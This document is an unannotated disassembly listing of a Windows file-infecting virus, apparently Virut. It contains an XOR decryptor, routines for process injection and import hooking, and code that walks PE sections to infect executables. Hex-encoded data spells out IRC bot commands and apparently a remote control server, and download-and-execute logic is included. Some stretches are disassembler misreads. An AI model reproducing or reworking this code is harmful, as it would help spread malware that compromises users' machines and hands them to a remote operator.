call near ptr loc_41F772+1
inc ebx
jb short near ptr loc_41F7CD+1
popa
jz short near ptr loc_41F7CD+4
inc ebp
jbe short near ptr loc_41F7D3+1
outsb
jz short near ptr loc_41F7B1+2
loc_41F772: ; CODE XREF: .data:0041F761�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_41F78E
inc edi
db 65h
jz short near ptr loc_41F7CD+4
popa
jnb short loc_41F7FC
inc ebp
jb short near ptr loc_41F7FC+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_41F78E proc near ; CODE XREF: .data:0041F77C�p
; FUNCTION CHUNK AT 0041F837 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 0041F977 SIZE 0000013A BYTES
push ebx
call esi
mov dword ptr ss:loc_403544[ebp], eax
call sub_41F80C
test eax, eax
jz short loc_41F7C1
push eax
call dword ptr ss:loc_403544[ebp]
test eax, eax
jnz short loc_41F7BB
lea eax, [ebp+4011D2h]
loc_41F7B1: ; CODE XREF: .data:0041F770�j
mov dl, [eax-1]
loc_41F7B4: ; CODE XREF: .data:0041F74F�j
call sub_41F827
jmp short loc_41F837
; ---------------------------------------------------------------------------
loc_41F7BB: ; CODE XREF: sub_41F78E+1B�j
; sub_41F78E+136�j ...
call dword ptr [ebp+40353Ch]
loc_41F7C1: ; CODE XREF: sub_41F78E+10�j
test dword ptr ss:loc_403431[ebp], 80000000h
jz short loc_41F7EB
loc_41F7CD: ; CODE XREF: .data:0041F767�j
; .data:0041F76A�j ...
lea esi, [ebp+403435h]
loc_41F7D3: ; CODE XREF: .data:0041F76D�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, dword ptr ss:loc_4039B6[ebp]
mov edi, [ebp+4039BAh]
loc_41F7EB: ; CODE XREF: sub_41F78E+3D�j
pop ebp
retn
sub_41F78E endp
; ---------------------------------------------------------------------------
loc_41F7ED: ; CODE XREF: sub_41F80C+2�p
; sub_41F78E:loc_41F9F6�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_41F7FC: ; CODE XREF: .data:0041F786�j
; .data:0041F789�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 4
; =============== S U B R O U T I N E =======================================
sub_41F80C proc near ; CODE XREF: sub_41F78E+9�p
xor ecx, ecx
call loc_41F7ED
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_41F80C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F827 proc near ; CODE XREF: sub_41F78E:loc_41F7B4�p
; sub_4215FB+25B�p
mov dh, dl
mov ecx, 225Fh
loc_41F82E: ; CODE XREF: sub_41F827+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_41F82E
retn
sub_41F827 endp
; ---------------------------------------------------------------------------
db 34h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F78E
loc_41F837: ; CODE XREF: sub_41F78E+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, dword ptr ss:loc_403431[ebp]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_41F85E: ; CODE XREF: sub_41F78E+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_41F85E
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_41FBF1
pop edi
call dword ptr ss:loc_403594[ebp]
shr eax, 1Fh
jz loc_41F977
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov dword ptr ss:loc_403550[ebp], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_41F7BB
xchg eax, edi
lea esi, dword_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset dword_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_41F78E
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr ss:loc_403550[ebp]
add esp, 20h
test eax, eax
jz loc_41F7BB
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr ss:loc_403550[ebp]
test eax, eax
jz loc_41F7BB
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr ss:loc_403550[ebp]
push 1000Ah
call dword ptr ss:loc_403550[ebp]
call sub_41F967
jmp loc_41F7BB
; =============== S U B R O U T I N E =======================================
sub_41F967 proc near ; CODE XREF: .data:0041F95D�p
; sub_41F967+D�j
push 1
pop ecx
jecxz short locret_41F976
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_41F967
; ---------------------------------------------------------------------------
locret_41F976: ; CODE XREF: sub_41F967+3�j
retn
sub_41F967 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F78E
loc_41F977: ; CODE XREF: sub_41F78E+10F�j
cmp dword ptr ss:loc_403570[ebp], 0
jz loc_41F7BB
call near ptr loc_41F98E+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_41F98E: ; CODE XREF: sub_41F78E+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_41F9AB+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_41FBF1
loc_41F9AB: ; CODE XREF: sub_41F78E+209�j
cmp dword ptr ss:loc_4035F8[ebp], 0
jz loc_41F7BB
mov eax, dword ptr ss:loc_4035D4[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, dword ptr ss:loc_4035E8[ebp]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, dword ptr ss:loc_4035DC[ebp]
jecxz short loc_41F9F6
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_41F9F6: ; CODE XREF: sub_41F78E+25D�j
call loc_41F7ED
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_41FA3B: ; CODE XREF: sub_41F78E+2B0�j
lodsb
stosw
loop loc_41FA3B
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr ss:loc_4035E4[ebp]
pop edi
pop ecx
test edi, edi
jz loc_41F7BB
lea esi, dword_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset dword_401000
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_41F78E
; ---------------------------------------------------------------------------
db 8Dh, 95h, 0E0h
db 18h
db 40h, 0, 52h
db 0FFh
db 95h, 9Ch, 35h
db 40h ; @
align 2
dw 16E8h
db 0
db 2 dup(0), 4Ch
aOokupprivilege db 'ookupPrivilegeValueA',0
db 50h, 0FFh, 95h
dd offset loc_403546+2
dd 354C8589h, 54500040h, 0FF6A206Ah, 35EC95FFh, 0C0850040h
dd 963F755Fh, 5656026Ah, 16AD48Bh, 11E852h, 65530000h
dd 75626544h, 69725067h, 656C6976h, 56006567h, 354C95FFh
dd 0C48B0040h, 50565656h, 95FF5756h, 4035D0h, 5710C483h
dd 353C95FFh, 6A0040h, 95FF026Ah, 403570h, 128B9h, 0E12B9700h
dd 54240C89h, 0AC95FF57h, 33004035h, 3CA583F6h, 4036h
dd 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h, 74FFEE72h
dd 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h, 43DE893h, 0C9330000h
dd 3930E391h, 40363C85h, 81287500h, 0DAEC1h, 50545000h
dd 50505156h, 6895FF53h, 85004035h, 0F7459C0h, 82474FFh
dd 363C858Fh, 0ACE80040h, 53FFFFFDh, 353C95FFh, 98EB0040h
dd 128C481h, 0FF570000h, 40353C95h, 0FBE5E900h, 498DFFFFh
dd 58585800h, 29CE00h, 0D6500h, 3 dup(0)
db 0
; =============== S U B R O U T I N E =======================================
sub_41FBF1 proc near ; CODE XREF: sub_41F78E+100�p
; sub_41F78E+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_41FBFC: ; CODE XREF: sub_41FBF1+E�j
lodsb
test al, al
jnz short loc_41FBFC
loop sub_41FBF1
retn
sub_41FBF1 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea_0 db 'CreateFileA',0
aCreatefilema_1 db 'CreateFileMappingA',0
aCreateproces_0 db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread_0 db 'CreateThread',0
aCreatetoolhe_0 db 'CreateToolhelp32Snapshot',0
aExitthread_0 db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize_0 db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehan_1 db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionex_1 db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffil_1 db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess_0 db 'OpenProcess',0
aProcess32fir_0 db 'Process32First',0
aProcess32nex_0 db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoff_0 db 'UnmapViewOfFile',0
aVirtualalloc_1 db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_41FF8C proc near ; CODE XREF: sub_41FFC3+70�p
; sub_41FFC3+81�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_41FF8C endp
; =============== S U B R O U T I N E =======================================
sub_41FFC3 proc near ; CODE XREF: .data:00421A85�p
push edi
lea eax, loc_4015B1[ebp]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_42006F
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr ss:loc_4035E4[ebp]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_42006F
mov ecx, [ebp+401588h]
jecxz short loc_420027
lea edx, dword_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_420027: ; CODE XREF: sub_41FFC3+56�j
mov eax, dword ptr ss:loc_4035D4[ebp]
lea ecx, [edi+2394h]
call sub_41FF8C
mov eax, dword ptr ss:loc_4035E8[ebp]
lea ecx, [edi+23E1h]
call sub_41FF8C
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_41FF8C
loc_42005A: ; DATA XREF: .data:00421CBC�o
mov eax, dword ptr ss:loc_4035DC[ebp]
test eax, eax
jz short loc_42006F
lea ecx, [edi+23F5h]
call sub_41FF8C
loc_42006F: ; CODE XREF: sub_41FFC3+16�j
; sub_41FFC3+4E�j ...
mov eax, edi
pop edi
retn
sub_41FFC3 endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, loc_401DAE[ebp]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dw 0E855h
align 8
dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
dd 0FEAA6142h, 0C3F075C9h
; =============== S U B R O U T I N E =======================================
sub_420154 proc near ; CODE XREF: sub_4209BF+1B�p
; sub_420B37+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_420154 endp
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
dd 80C3F800h, 4015778Dh, 0C3F90100h, 54464F53h, 45524157h
dd 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h, 435C7377h
dd 65727275h, 6556746Eh, 6F697372h, 78455C6Eh, 726F6C70h
dd 54007265h, 65677261h, 736F4874h, 20074h, 413AF0FFh
dd 72705AEAh, 6D69786Fh, 6372692Eh, 616C6167h, 702E7978h
dd 494E006Ch, 78204B43h, 7565626Ah, 0A756766h, 52455355h
dd 32307120h, 31303530h, 2E202E20h, 4A2D3A20h, 204E494Fh
dd 72697626h, 550A7574h, 0E8h, 0ED815D00h, 401DB4h, 157785C6h
dd 0FF000040h, 40359495h, 1FE8C100h, 1E6A3C74h, 3550B58Bh
dd 0AC590040h, 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 403640BDh
dd 2768B00h, 0A566A557h, 336A858Dh, 858F0040h, 403390h
dd 0FA4689FAh, 0FBFE4E8Ch, 0CFE201B1h, 858D43EBh, 4015B1h
dd 6A006A50h, 0A495FF0Eh, 83004035h, 408247Ch, 4E82B75h
dd 53000000h, 0FF004346h, 40358895h, 0FC48E800h, 7E8FFFFh
dd 53000000h, 4F5F4346h, 95FF0053h, 403588h, 0FFFC31E8h
dd 0F356E8FFh, 8DFFFFFFh, 401303h, 0BE8h, 45535500h, 2E323352h
dd 4C4C44h, 359C95FFh, 0AE80040h, 77000000h, 69727073h
dd 4166746Eh, 95FF5000h, 403548h, 35548589h, 310F0040h
dd 18E08D8Dh, 85890040h, 403646h, 9C95FF51h, 93004035h
dd 468h, 0EDB58D00h, 59004018h, 362CBD8Dh, 0D6E80040h
dd 66FFFFF6h, 1D6785C7h, 0F0FF0040h, 1D69A583h, 8D000040h
dd 401D2795h, 6A545000h, 52006A01h, 268h, 3095FF80h, 85004036h
dd 22755AC0h, 1D5A8D8Dh, 6A520040h, 67B58D06h, 5400401Dh
dd 51505056h, 3495FF52h, 58004036h, 362C95FFh, 85C60040h
dd 40384Dh, 0CE800h, 53570000h, 334B434Fh, 4C442E32h, 95FF004Ch
dd 40359Ch, 76893h, 0B58D0000h, 401844h, 0FCBD8D59h, 0E8004035h
dd 0FFFFF651h, 0CE8h, 4E495700h, 54454E49h, 4C4C442Eh
dd 9C95FF00h, 85004035h, 0E7840FC0h, 93000001h, 568h, 82B58D00h
dd 59004018h, 3618BD8Dh, 1AE80040h, 83FFFFF6h, 40361CBDh
dd 840F0000h, 1C2h, 190EC81h, 68540000h, 101h, 35FC95FFh
dd 0C4810040h, 190h, 6AD48B50h, 95FF5200h, 40361Ch, 7559C085h
dd 1388680Dh, 95FF0000h, 4035BCh, 0BD83E2EBh, 401D69h
dd 8D297500h, 401D6D85h, 95FF5000h, 403608h, 840FC085h
dd 13Bh, 8B0C408Bh, 8F30FF00h, 401D6985h, 4D85C600h, 1004038h
dd 16A006Ah, 95FF026Ah, 403614h, 0FFFF883h, 11284h, 958D9300h
dd 401D65h, 5352106Ah, 360495FFh, 0C0850040h, 0F2850Fh
dd 0BD8D0000h, 401D86h, 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 40359895h, 94BD8D00h, 0B100401Dh, 0FA9DE801h
dd 448BFFFFh, 0E0C11024h, 24440B08h, 8E0C104h, 824440Bh
dd 5E850h, 2E250000h, 57007836h, 355495FFh, 0C4830040h
dd 647C60Ch, 81958D20h, 6A00401Dh, 216800h, 53520000h
dd 361095FFh, 7C8D0040h, 0FF571424h, 40355895h, 3804C600h
dd 6A400Ah, 0FF535750h, 40361095h, 8DE60300h, 401DA2BDh
dd 68006A00h, 0Ch, 95FF5357h, 403610h, 0C3Dh, 8D4D7500h
dd 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh, 95FF5356h
dd 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh, 0DB00040h
dd 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 364EBD8Dh, 0A4F30040h, 0B9EBF787h, 95FF53h
dd 80004036h, 401577BDh, 2A740100h, 753068h, 0BC95FF00h
dd 80004035h, 40384DBDh, 11740000h, 1D6985C7h, 40h, 85C60000h
dd 40384Dh, 0FE56E900h, 85C7FFFFh, 401580h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 0D216574h, 0C784040Ah
dd 0D479ED30h, 0A614294Fh, 0B7AB410h, 37524805h, 858B9940h
dd 0B1FAE5DBh, 0A6141327h, 0B8B35210h, 99AD47D8h, 73C17E62h
dd 6EF96A1Ah, 0AB595760h, 0C216EF3Ah, 46319413h, 6CCC5CEFh
dd 0C2h, 0Eh dup(0)
dd 37523200h
; ---------------------------------------------------------------------------
inc eax
; =============== S U B R O U T I N E =======================================
sub_420909 proc near ; CODE XREF: sub_420950:loc_4209AD�p
; sub_420A10+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr ss:loc_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_420925: ; CODE XREF: sub_420909+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_420947
cmp eax, [edx+8]
jnb short loc_420947
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov dword ptr ss:loc_4039AA[ebp], eax
jmp short loc_42094C
; ---------------------------------------------------------------------------
loc_420947: ; CODE XREF: sub_420909+23�j
; sub_420909+28�j
add edx, 28h
loop loc_420925
loc_42094C: ; CODE XREF: sub_420909+3C�j
popa
retn 4
sub_420909 endp
; =============== S U B R O U T I N E =======================================
sub_420950 proc near ; CODE XREF: .data:00420C7C�p
; .data:00420CA2�p
mov [ebp+4022F7h], al
call sub_4209BF
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_420967: ; CODE XREF: sub_420950+1E�j
cmp [eax], ebx
jz short loc_420977
add eax, 4
loop loc_420967
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_420977: ; CODE XREF: sub_420950+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_420991
loc_420981: ; CODE XREF: sub_420950+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_420981
mov [ebp+402224h], ebx
loc_420991: ; CODE XREF: sub_420950+2F�j
; sub_4209BF+34�j
cmp dword ptr [edx], 0
jz short loc_42099B
sub esi, [edx]
add esi, [edx+10h]
loc_42099B: ; CODE XREF: sub_420950+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_4209AA
push dword ptr [edx]
jmp short loc_4209AD
; ---------------------------------------------------------------------------
loc_4209AA: ; CODE XREF: sub_420950+54�j
push dword ptr [edx+10h]
loc_4209AD: ; CODE XREF: sub_420950+58�j
call sub_420909
sub ecx, esi
sub ecx, dword ptr ss:loc_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_420950 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4209BF proc near ; CODE XREF: sub_420950+6�p
pop dword ptr ss:loc_403992[ebp]
mov dword ptr [ebp+40398Eh], 0
call sub_420A10
mov eax, [ebp+40398Eh]
call sub_420154
call sub_4209FC
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_4209F5
mov [ebp+4022A0h], ebx
jmp short loc_420991
; ---------------------------------------------------------------------------
loc_4209F5: ; CODE XREF: sub_4209BF+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_4209BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4209FC proc near ; CODE XREF: sub_4209BF+20�p
pop dword ptr ss:loc_403992[ebp]
mov [ebp+40398Eh], edx
call sub_420A10
xor ecx, ecx
retn
sub_4209FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_420A10 proc near ; CODE XREF: sub_4209BF+10�p
; sub_4209FC+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_420909
add edx, dword ptr ss:loc_4039AA[ebp]
add edx, esi
loc_420A24: ; CODE XREF: sub_420A10+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_420B35
cmp dword ptr [edx+10h], 0
jz locret_420B35
mov eax, [edx+0Ch]
push eax
call sub_420909
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, esi
push eax
loc_420A4A: ; CODE XREF: sub_420A10+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_420A6A
cmp cl, 2Eh
jz short loc_420A59
loc_420A56: ; CODE XREF: sub_420A10+58�j
inc eax
jmp short loc_420A4A
; ---------------------------------------------------------------------------
loc_420A59: ; CODE XREF: sub_420A10+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_420A56
loc_420A6A: ; CODE XREF: sub_420A10+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_420B2D
cmp word ptr [eax-2], 3233h
jnz loc_420B2D
push esi
cmp dword ptr [edx], 0
jnz short loc_420A8D
mov ecx, [edx+10h]
jmp short loc_420A8F
; ---------------------------------------------------------------------------
loc_420A8D: ; CODE XREF: sub_420A10+76�j
mov ecx, [edx]
loc_420A8F: ; CODE XREF: sub_420A10+7B�j
add esi, ecx
push ecx
call sub_420909
add esi, dword ptr ss:loc_4039AA[ebp]
loc_420A9D: ; CODE XREF: sub_420A10+90�j
; sub_420A10+117�j
lodsd
test eax, eax
js short loc_420A9D
jz loc_420B2C
push dword ptr ss:loc_4039AA[ebp]
push eax
call sub_420909
add eax, dword ptr ss:loc_4039AA[ebp]
pop dword ptr ss:loc_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_420AC9: ; CODE XREF: sub_420A10+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_420AE0
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_420AC9
; ---------------------------------------------------------------------------
loc_420AE0: ; CODE XREF: sub_420A10+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_420B26
cmp ebx, 0DB6E45A8h
jz short loc_420B26
cmp ebx, 0FFA13B59h
jz short loc_420B26
cmp ebx, 0ACB522D6h
jz short loc_420B26
cmp ebx, 0F358E993h
jz short loc_420B26
cmp ebx, 0F358E97Dh
jz short loc_420B26
cmp ebx, 0E1253F46h
jz short loc_420B26
cmp ebx, 0E1253F30h
jz short loc_420B26
call dword ptr ss:loc_403992[ebp]
loc_420B26: ; CODE XREF: sub_420A10+D6�j
; sub_420A10+DE�j ...
pop ebx
jmp loc_420A9D
; ---------------------------------------------------------------------------
loc_420B2C: ; CODE XREF: sub_420A10+92�j
pop esi
loc_420B2D: ; CODE XREF: sub_420A10+60�j
; sub_420A10+6C�j
add edx, 14h
jmp loc_420A24
; ---------------------------------------------------------------------------
locret_420B35: ; CODE XREF: sub_420A10+18�j
; sub_420A10+22�j
retn
sub_420A10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_420B37 proc near ; CODE XREF: .data:00420C75�p
; .data:00420C9B�p
push 4
pop eax
call sub_420154
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
